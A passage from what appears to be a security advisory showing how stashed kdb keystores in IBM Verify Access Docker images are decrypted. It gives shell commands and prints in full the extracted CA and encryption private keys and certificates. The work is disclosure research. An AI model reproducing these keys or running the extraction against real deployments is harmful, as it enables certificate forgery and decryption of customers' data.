{iov_base=\"+\\0\\30\\0\\0\\0\\0\\0\\0\\0\\0\\0\\200\\201\\256\\213\\7\\0var/openldap/d\"..., iov_len=1024}], 2) = 1024\n read(4, \"\", 8191) = 0\n close(4) = 0\n write(5, \"\\5\\0\\3\\250\\302\\36cux\\v\\0\\1\\4\\0\\0\\0\\0\\4\\0\\0\\0\\0PK\\5\\6\\0\\0\\0\\0[\\0\"..., 44) = 44\n close(5) = 0\n unlink(\"openldap.zip\") = 0\n rename(\"/tmp/tmp.pxiQjh\", \"openldap.zip\") = 0\n unlink(\"/tmp/tmp.pxiQjh\") = -1 ENOENT (No such file or directory)\n close(3) = 0\n exit_group(0) = ?\n +++ exited with 0 +++\n kali-decryption% file openldap.zip \n openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store\n\nWhile doing an analysis of the zip file, we can find:\n\n- - credentials;\n- - passwords (e.g. in `etc/openldap/dynamic/replica-1.conf` and `etc/openldap/dynamic/passwd.conf`)\n- - RSA keys + certificates (e.g. in `etc/openldap/dynamic/server.key`)\n- - users in the logs. \n\nThe unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:\n\n kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done\n ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb\n ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb\n ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb\n ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb\n ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb\n ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n\nThis allows an attacker to extract several private keys:\n\n Bag Attributes\n friendlyName: ca\n localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n Key Attributes: \u003cNo Attributes\u003e\n -----BEGIN PRIVATE KEY-----\n MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74\n 01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26\n X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM\n +Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr\n qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R\n CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs\n RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm\n MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu\n 894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy\n MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l\n zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr\n 7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM\n iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV\n PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+\n dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo\n o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT\n E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV\n mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM\n m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki\n xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG\n 0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb\n TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd\n Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm\n ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj\n dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR\n uxhPVbNJYbPOs02by37UXn8=\n -----END PRIVATE KEY-----\n Bag Attributes\n friendlyName: encKey\n localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n Key Attributes: \u003cNo Attributes\u003e\n -----BEGIN PRIVATE KEY-----\n MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD\n N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM\n x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6\n szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw\n G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM\n DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3\n R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv\n 9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ\n eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi\n T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH\n f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt\n VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A\n UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH\n blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE\n X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC\n PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG\n 5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG\n UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA\n X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4\n DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649\n +YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee\n ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU\n WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC\n 5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy\n NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH\n arClGP/McDNH4FD3S9dgJQ==\n -----END PRIVATE KEY-----\n\n\nAnd the corresponding certificates:\n\n Bag Attributes\n friendlyName: ca\n localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n subject=C = us, O = ibm, OU = isam, CN = ca\n issuer=C = us, O = ibm, OU = isam, CN = ca\n -----BEGIN CERTIFICATE-----\n MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE\n BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew\n IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz\n MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN\n BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA\n fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0\n 6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90\n 3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW\n bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST\n 8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB\n o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU\n V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj\n Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP\n Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b\n dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641\n bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr\n gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75\n cGAPLNhMRL8=\n -----END CERTIFICATE-----\n Bag Attributes\n friendlyName: encKey\n localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n subject=C = US, O = IBM, OU = GSKIT, CN = encKey\n issuer=C = US, O = IBM, OU = GSKIT, CN = encKey\n -----BEGIN CERTIFICATE-----\n MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE\n BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu\n Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT\n AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL\n ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib\n ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7\n AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE\n MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii\n ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE\n PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ\n ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC\n pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK\n pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi\n enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi\n 0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b\n QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2\n 4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5\n CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD\n 8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB\n +NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM\n Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/\n GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj\n DxxuUpf+LWXLEw==\n -----END CERTIFICATE-----\n\n\nAfter the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:\n\n kali-docker# openssl x509 -in ca.pem -text -noout -modulus\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)\n Signature Algorithm: sha256WithRSAEncryption\n Issuer: C=us, O=ibm, OU=isam, CN=ca\n Validity\n Not Before: Mar 21 04:57:03 2019 GMT\n Not After : May 11 04:57:03 2101 GMT\n Subject: C=us, O=ibm, OU=isam, CN=ca\n Subject Public Key Info:\n Public Key Algorithm: rsaEncryption\n Public-Key: (2048 bit)\n Modulus:\n 00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:\n a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:\n fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:\n 7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:\n 81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:\n f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:\n 17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:\n 62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:\n 64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:\n 4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:\n b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:\n 56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:\n 22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:\n 22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:\n 05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:\n c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:\n 00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:\n 16:75\n Exponent: 65537 (0x10001)\n X509v3 extensions:\n X509v3 Authority Key Identifier: \n 57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n X509v3 Subject Key Identifier: \n 57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n Signature Algorithm: sha256WithRSAEncryption\n Signature Value:\n 6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:\n a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:\n 20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:\n ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:\n 81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:\n 1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:\n 00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:\n f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:\n aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:\n 1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:\n 0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:\n 72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:\n 81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:\n b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:\n d8:4c:44:bf\n Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n kali-docker# openssl rsa -in ca.key -modulus -noout \n Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n \n kali-docker# openssl x509 -in encKey.pem -text -noout -modulus\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)\n Signature Algorithm: sha1WithRSAEncryption\n Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey\n Validity\n Not Before: Mar 21 04:56:59 2019 GMT\n Not After : Mar 19 04:56:59 2029 GMT\n Subject: C=US, O=IBM, OU=GSKIT, CN=encKey\n Subject Public Key Info:\n Public Key Algorithm: rsaEncryption\n Public-Key: (2048 bit)\n Modulus:\n 00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:\n 47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:\n 79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:\n 15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:\n 59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:\n 50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:\n 3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:\n f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:\n 49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:\n e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:\n e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:\n 8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:\n d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:\n 37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:\n 75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:\n a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:\n 6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:\n b1:2d\n Exponent: 65537 (0x10001)\n X509v3 extensions:\n 1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001: \n DN.T+L. Z..$.....6B..j.h[i.b-\"e\u003e.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....\u0026bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.\u003c..P.\u003c...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=\n Signature Algorithm: sha1WithRSAEncryption\n Signature Value:\n bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:\n 75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:\n e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:\n f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:\n 07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:\n a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:\n c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:\n 12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:\n 49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:\n 25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:\n ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:\n 